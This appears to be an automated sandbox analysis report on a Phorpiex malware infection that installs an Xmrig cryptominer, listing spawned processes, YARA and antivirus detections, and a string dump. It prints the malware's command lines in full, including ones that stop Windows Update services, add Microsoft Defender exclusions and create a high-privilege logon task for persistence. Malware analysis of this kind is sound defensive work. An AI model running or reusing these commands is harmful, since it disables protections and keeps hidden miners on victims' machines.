MD5 hash:	D9D7684B8431A0D10D0E76FE9F5FFEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	01:26:39
Start date:	26/10/2024
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	sc stop wuauserv
Imagebase:	0xbb0000
File size:	61'440 bytes
MD5 hash:	D9D7684B8431A0D10D0E76FE9F5FFEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	01:26:39
Start date:	26/10/2024
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	sc stop DoSvc
Imagebase:	0xbb0000
File size:	61'440 bytes
MD5 hash:	D9D7684B8431A0D10D0E76FE9F5FFEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	01:26:39
Start date:	26/10/2024
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	sc stop BITS /wait
Imagebase:	0xbb0000
File size:	61'440 bytes
MD5 hash:	D9D7684B8431A0D10D0E76FE9F5FFEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	01:26:46
Start date:	26/10/2024
Path:	C:\Windows\sysppvrdnvs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\sysppvrdnvs.exe"
Imagebase:	0x400000
File size:	85'504 bytes
MD5 hash:	06560B5E92D704395BC6DAE58BC7E794
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000013.00000000.1588390233.0000000000410000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	01:26:56
Start date:	26/10/2024
Path:	C:\Users\user\AppData\Local\Temp\158238779.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user~1\AppData\Local\Temp\158238779.exe
Imagebase:	0x1c0000
File size:	8'704 bytes
MD5 hash:	CB8420E681F68DB1BAD5ED24E7B22114
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 75%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	01:26:56
Start date:	26/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
Imagebase:	0x7ff6aa610000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	01:26:56
Start date:	26/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	01:26:56
Start date:	26/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
Imagebase:	0x7ff6aa610000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	01:26:57
Start date:	26/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	01:26:57
Start date:	26/10/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
Imagebase:	0x7ff7dd7d0000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	01:26:57
Start date:	26/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks /delete /f /tn "Windows Upgrade Manager"
Imagebase:	0x7ff7de9c0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	01:27:04
Start date:	26/10/2024
Path:	C:\Users\user\AppData\Local\Temp\281653412.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user~1\AppData\Local\Temp\281653412.exe
Imagebase:	0xe80000
File size:	15'872 bytes
MD5 hash:	0C37EE292FEC32DBA0420E6C94224E28
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 58%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	01:27:09
Start date:	26/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	29
Start time:	01:27:13
Start date:	26/10/2024
Path:	C:\Users\user\AppData\Local\Temp\1332331323.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user~1\AppData\Local\Temp\1332331323.exe
Imagebase:	0x950000
File size:	10'240 bytes
MD5 hash:	96509AB828867D81C1693B614B22F41D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 76%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	01:27:21
Start date:	26/10/2024
Path:	C:\Users\user\AppData\Local\Temp\2311326414.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user~1\AppData\Local\Temp\2311326414.exe
Imagebase:	0x7a0000
File size:	13'312 bytes
MD5 hash:	5A0D146F7A911E98DA8CC3C6DE8ACABF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 55%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	01:27:22
Start date:	26/10/2024
Path:	C:\Users\user\AppData\Local\Temp\446629599.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user~1\AppData\Local\Temp\446629599.exe
Imagebase:	0x400000
File size:	85'504 bytes
MD5 hash:	06560B5E92D704395BC6DAE58BC7E794
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000021.00000000.1949731068.0000000000410000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000021.00000002.1986636602.0000000000410000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000021.00000002.1986738654.000000000057E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\AppData\Local\Temp\446629599.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 82%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	01:27:24
Start date:	26/10/2024
Path:	C:\Users\user\AppData\Local\Temp\2448028260.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user~1\AppData\Local\Temp\2448028260.exe
Imagebase:	0x7ff6e1e50000
File size:	5'827'584 bytes
MD5 hash:	13B26B2C7048A92D6A843C1302618FAD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 76%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	01:27:25
Start date:	26/10/2024
Path:	C:\Users\user\sysppvrdnvs.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\sysppvrdnvs.exe
Imagebase:	0x400000
File size:	85'504 bytes
MD5 hash:	06560B5E92D704395BC6DAE58BC7E794
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000023.00000002.2627233365.0000000000410000.00000002.00000001.01000000.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000023.00000000.1976145001.0000000000410000.00000002.00000001.01000000.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\sysppvrdnvs.exe, Author: Joe Security
Antivirus matches:	Detection: 82%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	36
Start time:	01:27:27
Start date:	26/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 5216, Parent PID: 6204

General

Target ID:	37
Start time:	01:27:28
Start date:	26/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	01:27:28
Start date:	26/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 5576, Parent PID: 6844

General

Target ID:	39
Start time:	01:27:28
Start date:	26/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	01:27:28
Start date:	26/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
Imagebase:	0x880000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: sc.exePID: 7344, Parent PID: 6844

General

Target ID:	41
Start time:	01:27:28
Start date:	26/10/2024
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	sc stop UsoSvc
Imagebase:	0xbb0000
File size:	61'440 bytes
MD5 hash:	D9D7684B8431A0D10D0E76FE9F5FFEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	01:27:28
Start date:	26/10/2024
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	sc stop WaaSMedicSvc
Imagebase:	0xbb0000
File size:	61'440 bytes
MD5 hash:	D9D7684B8431A0D10D0E76FE9F5FFEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	01:27:28
Start date:	26/10/2024
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	sc stop wuauserv
Imagebase:	0xbb0000
File size:	61'440 bytes
MD5 hash:	D9D7684B8431A0D10D0E76FE9F5FFEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	01:27:28
Start date:	26/10/2024
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	sc stop DoSvc
Imagebase:	0xbb0000
File size:	61'440 bytes
MD5 hash:	D9D7684B8431A0D10D0E76FE9F5FFEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	01:27:28
Start date:	26/10/2024
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	sc stop BITS /wait
Imagebase:	0xbb0000
File size:	61'440 bytes
MD5 hash:	D9D7684B8431A0D10D0E76FE9F5FFEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	01:27:29
Start date:	26/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	01:27:29
Start date:	26/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	01:27:34
Start date:	26/10/2024
Path:	C:\Users\user\sysppvrdnvs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\sysppvrdnvs.exe"
Imagebase:	0x400000
File size:	85'504 bytes
MD5 hash:	06560B5E92D704395BC6DAE58BC7E794
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000030.00000002.2090805387.0000000000410000.00000002.00000001.01000000.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000030.00000000.2069869412.0000000000410000.00000002.00000001.01000000.00000010.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	01:27:39
Start date:	26/10/2024
Path:	C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe"
Imagebase:	0x7ff75cfc0000
File size:	5'827'584 bytes
MD5 hash:	13B26B2C7048A92D6A843C1302618FAD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000033.00000002.2319595860.00007FF75CFDB000.00000004.00000001.01000000.00000014.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000033.00000002.2319595860.00007FF75CFDB000.00000004.00000001.01000000.00000014.sdmp, Author: unknown
Antivirus matches:	Detection: 76%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	01:27:42
Start date:	26/10/2024
Path:	C:\Users\user\sysppvrdnvs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\sysppvrdnvs.exe"
Imagebase:	0x400000
File size:	85'504 bytes
MD5 hash:	06560B5E92D704395BC6DAE58BC7E794
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000034.00000000.2150937536.0000000000410000.00000002.00000001.01000000.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000034.00000002.2171612447.0000000000410000.00000002.00000001.01000000.00000010.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	01:27:44
Start date:	26/10/2024
Path:	C:\Users\user\AppData\Local\Temp\193938922.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user~1\AppData\Local\Temp\193938922.exe
Imagebase:	0x350000
File size:	8'704 bytes
MD5 hash:	CB8420E681F68DB1BAD5ED24E7B22114
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 75%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	01:27:44
Start date:	26/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
Imagebase:	0x7ff6aa610000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7720, Parent PID: 6704

General

Target ID:	55
Start time:	01:27:44
Start date:	26/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	01:27:44
Start date:	26/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
Imagebase:	0x7ff6aa610000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 4504, Parent PID: 7080

General

Target ID:	57
Start time:	01:27:44
Start date:	26/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	01:27:44
Start date:	26/10/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
Imagebase:	0x7ff7dd7d0000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	01:27:44
Start date:	26/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks /delete /f /tn "Windows Upgrade Manager"
Imagebase:	0x7ff7de9c0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	01:27:44
Start date:	26/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 2756, Parent PID: 7648

General

Target ID:	61
Start time:	01:27:44
Start date:	26/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	62
Start time:	01:27:53
Start date:	26/10/2024
Path:	C:\Users\user\AppData\Local\Temp\236013504.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user~1\AppData\Local\Temp\236013504.exe
Imagebase:	0xf40000
File size:	15'872 bytes
MD5 hash:	0C37EE292FEC32DBA0420E6C94224E28
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 58%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	63
Start time:	01:27:59
Start date:	26/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\conhost.exe
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	64
Start time:	01:27:59
Start date:	26/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	65
Start time:	01:27:59
Start date:	26/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	66
Start time:	01:27:59
Start date:	26/10/2024
Path:	C:\Windows\System32\dwm.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\dwm.exe
Imagebase:	0x7ff74b010000
File size:	94'720 bytes
MD5 hash:	5C27608411832C5B39BA04E33D53536C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000042.00000002.2630066615.0000018B41702000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	67
Start time:	01:28:02
Start date:	26/10/2024
Path:	C:\Users\user\AppData\Local\Temp\65841553.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user~1\AppData\Local\Temp\65841553.exe
Imagebase:	0xe30000
File size:	10'240 bytes
MD5 hash:	96509AB828867D81C1693B614B22F41D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 76%, ReversingLabs
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	18%
Total number of Nodes:	450
Total number of Limit Nodes:	10

Executed Functions

Function 0000000140001052 Relevance: 52.2, Strings: 41, Instructions: 927COMMON

Download Yara Rule

Strings

Disassembly failed (could be because of memory issues), xrefs: 0000000140002040
-applybsdiff failed., xrefs: 00000001400020DE
courgette.log, xrefs: 0000000140001092
-disadj <old_in> <new_in> <new_assembly_file_out>, xrefs: 000000014000204E
-apply <old_in> <patch_in> <new_out>, xrefs: 00000001400020A6
-gen1[au] <old_in> <new_in> <patch_base_out>, xrefs: 00000001400020FA
Wrong version patch, xrefs: 000000014000207C
-gen failed., xrefs: 0000000140002098
nologfile, xrefs: 0000000140001067
-supported <exec_file_in>, xrefs: 0000000140002108
'old' input, xrefs: 000000014000159E, 000000014000171F, 00000001400017F3, 0000000140002140
applybsdiff, xrefs: 000000014000113C
-apply failed., xrefs: 00000001400021C1
Not a courgette patch, xrefs: 0000000140002132
'new' input, xrefs: 00000001400015B0, 0000000140001731
gen, xrefs: 0000000140001103
-dis <exec_file_in> <assembly_file_out>, xrefs: 0000000140001FF4
Can't open output, xrefs: 00000001400021A5
gen1u, xrefs: 0000000140001162
-gen <old_in> <new_in> <patch_out>, xrefs: 000000014000208A
-applybsdiff <old_in> <patch_in> <new_out>, xrefs: 00000001400020D0
input, xrefs: 00000001400012F7
genbsdiff, xrefs: 0000000140001129
-genbsdiff failed., xrefs: 00000001400020C2
asm, xrefs: 00000001400010DD
%s Executable, xrefs: 0000000140001F39
First argument must be one of: -supported, -asm, -dis, -disadj, -gen, -apply, -genbsdiff, -applybsdiff, or -gen1[au]., xrefs: 000000014000205C
Stream error (likely out of memory or disk space), xrefs: 0000000140002124
Corrupt patch, xrefs: 0000000140002116
supported, xrefs: 00000001400010B8
dis, xrefs: 00000001400010CA
-xxx failed., xrefs: 0000000140002002
